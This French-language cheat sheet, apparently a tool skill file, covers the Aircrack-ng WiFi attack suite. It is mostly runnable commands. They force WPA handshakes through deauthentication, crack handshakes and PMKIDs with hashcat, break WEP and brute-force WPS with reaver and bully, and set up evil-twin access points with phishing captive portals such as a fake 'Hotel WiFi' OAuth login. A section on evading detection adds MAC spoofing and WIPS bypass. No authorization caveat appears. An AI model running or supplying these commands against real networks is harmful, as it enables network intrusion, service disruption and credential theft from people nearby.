| name | aircrack-ng |
| description | Suite Aircrack-ng complète — mode monitor, capture WPA/WPA2 handshake, attaque PMKID, WEP cracking, WPA3, deauth, evil twin, aireplay-ng, et audit WiFi avancé. |
Aircrack-ng — Suite d'Audit WiFi
Présentation
Aircrack-ng est la suite complète d'audit de réseaux WiFi. Elle permet de capturer des paquets, forcer des handshakes, cracker des clés WEP/WPA/WPA2.
Composants :
| Commande | Usage |
|---|
| airmon-ng | Passer une carte en mode monitor |
| airodump-ng | Capture de paquets WiFi |
| aireplay-ng | Injection de paquets (deauth, fake auth) |
| aircrack-ng | Cracking WEP/WPA |
| airdecap-ng | Déchiffrer des captures |
| packetforge-ng | Créer des paquets injectables |
| besside-ng | Capture automatisée de handshake |
| airolib-ng | Gestion de base de données WPA |
Installation :
sudo apt install aircrack-ng
sudo airmon-ng
Mode Monitor
Activer le mode monitor
iwconfig
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airmon-ng start wlan0 6
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
Vérifier l'injection
sudo aireplay-ng -9 wlan0mon
sudo aireplay-ng -9 -i wlan1mon wlan0mon
Airodump-ng — Capture de paquets
Scan des réseaux
sudo airodump-ng wlan0mon
sudo airodump-ng -c 1,6,11 wlan0mon
sudo airodump-ng --band a wlan0mon
sudo airodump-ng --band abg wlan0mon
Capture ciblée sur un réseau
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
Paramètres du scan
BSSID : Adresse MAC de l'AP
PWR : Puissance du signal (dBm) — plus négatif = plus faible
Beacons : Nombre de beacon frames
#Data : Paquets de données capturés
#/s : Paquets par seconde
CH : Canal
MB : Vitesse max supportée
ENC : Chiffrement (OPN, WEP, WPA, WPA2, WPA3)
CIPHER : Algorithme (CCMP, TKIP, GCMP)
AUTH : Authentification (PSK, MGT, SAE)
ESSID : Nom du réseau
Attaque WPA/WPA2 — Handshake
1. Capturer le handshake (méthode passive)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
2. Forcer le handshake (deauth attack)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
3. Crack le handshake avec aircrack-ng
sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
4. Crack avec Hashcat (GPU — beaucoup plus rapide)
sudo aircrack-ng capture-01.cap -J hash
sudo aircrack-ng capture-01.cap -J hash 2>/dev/null
cap2hccapx capture-01.cap output.hccapx
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
hashcat -m 2500 output.hccapx /usr/share/wordlists/rockyou.txt
hashcat -m 16800 pmkid_hash.txt /usr/share/wordlists/rockyou.txt
Attaque PMKID (sans client)
Avantage : pas besoin de client connecté
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
hcxpcapngtool -o hash.22000 capture.pcapng
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
Avec airodump-ng
tshark -r capture-01.cap -Y "wlan.fixed.pmkid" 2>/dev/null
Attaque WEP
1. ARP Replay Attack (standard)
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng -1 0 -e ESSID -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
sudo aircrack-ng -b AA:BB:CC:DD:EE:FF capture-01.cap
2. KoreK ChopChop Attack
sudo aireplay-ng -4 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
3. Fragmentation Attack
sudo aireplay-ng -5 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
Attaque WPS
Wash — Détection WPS
sudo wash -i wlan0mon
sudo wash -i wlan0mon -C
sudo airodump-ng wlan0mon --wps
Bully — Crack WPS
sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -e ESSID -c 6 -S -F -B
Reaver — Crack WPS
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -N -vv
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 -K 1 -N -d 0
Evil Twin Attack
Avec airbase-ng (AP malveillant)
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
sudo airbase-ng -e "FreeWiFi" -c 6 -P -C 30 -W 1 wlan0mon \
--bssid 00:11:22:33:44:55
sudo ifconfig at0 up
sudo iptables --flush
sudo iptables --table nat --flush
sudo iptables --append FORWARD --in-interface at0 -j ACCEPT
sudo iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
sudo dhcpd -cf /etc/dhcp/dhcpd.conf at0
Evil Twin + Captive Portal
sudo wifiphisher -aI wlan0mon -jI wlan0 -p firmware-upgrade
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion && sudo ./fluxion.sh
WPA3 — Attaques
WPA3 Dragonblood (CVE-2019-9494)
sudo airodump-ng wlan0mon --wps
hashcat -m 22000 -a 0 hash.22000 rockyou.txt
Outils complémentaires
Besside-ng — Capture automatisée
sudo besside-ng wlan0mon
Airolib-ng — Base de données WPA
sudo airolib-ng wifi.db --import essid wordlist.txt
sudo airolib-ng wifi.db --import passwd rockyou.txt
sudo airolib-ng wifi.db --batch
sudo aircrack-ng -r wifi.db capture-01.cap
Kismet — Détection WiFi avancée
sudo kismet -c wlan0mon
Scénarios complets
1. Audit WPA2 complet
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo aircrack-ng -w rockyou.txt capture-01.cap
hcxpcapngtool -o hash.22000 capture-01.cap
hashcat -m 22000 hash.22000 rockyou.txt --force
2. Audit PMKID (sans client)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1
hcxpcapngtool -o hash.22000 capture.pcapng
hashcat -m 22000 hash.22000 rockyou.txt --force
3. Test d'intrusion WEP
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng -1 0 -e ESSID -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
sudo aircrack-ng -b AA:BB:CC:DD:EE:FF capture-01.cap
4. Attaque Evil Twin + Captive Portal
sudo wifiphisher -aI wlan0mon -jI wlan0 -p oauth-login \
--essid "Hotel WiFi"
Évasion de détection
Éviter les logs de l'AP
while true; do
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55 wlan0mon
sleep 10
done
sudo ifconfig wlan0mon down
sudo macchanger -r wlan0mon
sudo ifconfig wlan0mon up
Contournement des WIPS (Wireless IDS/IPS)
sudo aireplay-ng -0 1 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55 \
-D wlan0mon
Dépannage
| Problème | Solution |
|---|
| "No such device" | Vérifier avec iwconfig ou ip link |
| Injection fails | aireplay-ng -9 wlan0mon pour tester |
| Can't find handshake | airodump-ng ne capture pas → besside-ng |
| Hashcat slow | Vérifier hashcat -I, utiliser -d 1 (GPU) |
| WPS locked | Attendre 30+ minutes ou changer de cible |
| Too many deauths | Réduire le nombre : -0 1 au lieu de -0 5 |
Antisèche rapide
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
sudo aireplay-ng -0 3 -a AA:BB:CC:DD:EE:FF wlan0mon
sudo aircrack-ng -w rockyou.txt capture-01.cap
sudo hcxdumptool -i wlan0mon -o capture.pcapng
hcxpcapngtool -o hash.22000 capture.pcapng
hashcat -m 22000 hash.22000 rockyou.txt --force
sudo wash -i wlan0mon
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1
sudo airbase-ng -e "FreeWiFi" -c 6 wlan0mon
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager